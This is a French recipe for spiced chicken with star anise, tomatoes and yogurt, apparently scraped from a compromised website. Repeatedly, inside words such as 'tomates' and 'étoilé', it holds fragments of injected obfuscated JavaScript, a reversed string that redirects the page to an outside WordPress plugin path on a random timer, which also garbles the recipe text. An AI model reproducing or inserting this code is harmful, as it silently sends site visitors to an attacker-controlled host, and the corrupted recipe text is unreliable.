
POULET AUX ÉPICES
Pour 4 Pers.
INGRÉDIENTS :
– 1 poulet fermier découpé en morceaux (2 cuisses et 2 escalopes)
– 2 gousses d’ail
– 1 oignon rouge
– 1 CS de gingembre rapé (ou surgelé)
– 2 toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomates
– 3 étoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toiles de badiane (anis étoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toilé)
– Cumin en poudre : 1 CC.
– Canelle en poudre : 1 CC.
– Paprika doux : 1CC.
– 1 yaourt grec
– 1 CS d’huile d’olive
– sel/poivre
Émincer l’ail et l’oignon, râper le gingembre et couper les toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomates en petits dés.
Faire revenir dans une cocotte l’ail, l’oignon et le gingembre pendant 5 minutes.
Ajouter l’anis étoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toilé, le cumin, la cannelle et le paprika. Faire revenir 1 minute.
Verser les dés de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomate et le yaourt dans la cocotte.
Mélanger et laisser cuire 5 minutes avec le couvercle.
Ajouter le poulet, bien mélanger pour enrober toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tous les morceaux, couvrir et cuire à nouveau 40 minutes à feu doux (rajouter un peu d’eau en cours de cuisson si besoin pour obtenir une sauce bien onctueuse).
NB : Vous pouvez servir ce plat avec un riz parfumé thai ou basmati (NB: le riz basmati complet est le plus intéressant d’un point de vue nutritionnel).
Bon appétit !
